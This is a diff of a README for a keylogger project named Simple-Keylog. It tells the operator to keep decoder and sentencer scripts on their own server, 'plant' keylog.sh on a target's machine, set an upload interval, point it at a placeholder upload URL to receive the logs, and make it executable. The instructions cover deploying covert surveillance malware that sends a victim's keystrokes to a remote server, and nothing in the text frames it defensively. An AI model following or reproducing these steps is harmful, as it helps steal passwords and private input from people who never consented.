cons0le7/Simple-Keylog/README.md

 # How to use:

+- Keep "decoder.py" and "sentencer.py" on your servers machine where the logs will be saved.
+Only "keylog.sh" will need to be planted on target host.
-- Edit "keylog.sh" in notepad.
+- Edit "keylog.sh" in text editor of choice.
 - replace the upload interval with your desired amount in seconds.
 - Replace "http://yourserver.com/upload" with your own upload server url.
-- Open terminal of target host, cd to directory of keylog.sh and grant executable permissions using:
+- Plant "keylog.sh" in target's machine, open terminal, cd to directory of "keylog.sh" and grant executable permissions using:
 ```
 chmod +x keylog.sh
 ```